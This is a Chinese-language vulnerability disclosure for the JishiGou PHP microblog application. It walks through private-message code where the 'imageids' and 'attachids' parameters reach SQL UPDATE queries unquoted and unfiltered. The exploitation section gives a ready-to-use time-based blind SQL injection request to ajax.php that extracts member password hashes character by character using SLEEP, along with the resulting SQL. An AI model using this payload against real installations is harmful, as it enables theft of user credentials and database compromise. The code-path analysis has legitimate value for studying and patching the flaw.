测试版本: 20140124

1.分析:

文件名:pm.mod.php

    ..........以上省略 ..........
        load::logic('pm');
$PmLogic = new PmLogic();
$pmid = $this->Post['pmid'];     
if($che = $this->Post['che']){
    $this->Post['to_user'] = implode(",",$che);  //发送的账号名
}
$this->Post['message'] = jpost('message', 'txt'); //内容
if($pmid > 0){
    $return = $PmLogic->pmSendAgain($this->Post);  
}else{
    $return = $PmLogic->pmSend($this->Post);      //不设置pmid值的话进到pmSend函数里 我们进去看看
} 
       ..........以下省略 ..........

//master.mod.php
$this->Get = &$_GET;
$this->Post = &$_POST;
--------------------------------------------------
文件名:pm.logic.php

     
              ..........以上省略 ..........
           $to_user_list=array();
 
              . .........中间省略 ..........
 
foreach($to_user_list as $to_user_id => $to_user_name)
        {
            $data = array(
            "msgfrom"    =>$susername,
            "msgnickname"=>$snickname,
            "msgfromid"  =>$suid,                                "msgto" => $to_user_name['username'],                    "tonickname" => $to_user_name['nickname'],               "msgtoid"   => $to_user_id,                              'imageids' => $post['imageids'],
            'attachids' => $post['attachids'],  //
            "subject"   => $post['subject'],                 post的值是由pm.mod.php传过来的 我们继续往下看
            "message"   => $post['message'],  /
            "new"=>'1',
            "dateline"=>$time,
            );
 
                     . .........中间省略 ..........
 
                #标记音乐和附件,使清缓存的时候不会把附件删除
        if($data['imageids']){
            DB::query("update `".TABLE_PREFIX."topic_image` set `tid` = -1 where `id` in ({$data['imageids']})"); //没有使用单引号 ,也没过滤变量直接入口了 
        }
        if($data['attachids']){
            DB::query("update `".TABLE_PREFIX."topic_attach` set `tid` = -1 where `id` in ({$data['attachids']})"); //没有使用单引号 ,也没过滤变量直接入库了 
        }

由于程序如果执行报错的话 就会被记录在文件里 所以只好盲注入了

2.利用 :
需要登录的情况下
ajax.php?mod=pm&code=do_add
POST提交

to_user=admin&message=eeeeeeeeeeeeeeeeeeeeee&save_to_outbox=0&imageids=1&attachids=SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members

执行的sql语句:

update `jishigou_topic_attach` set `tid` = -1 where `id` in (SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members)

231304r6vgtexgdedlu0l4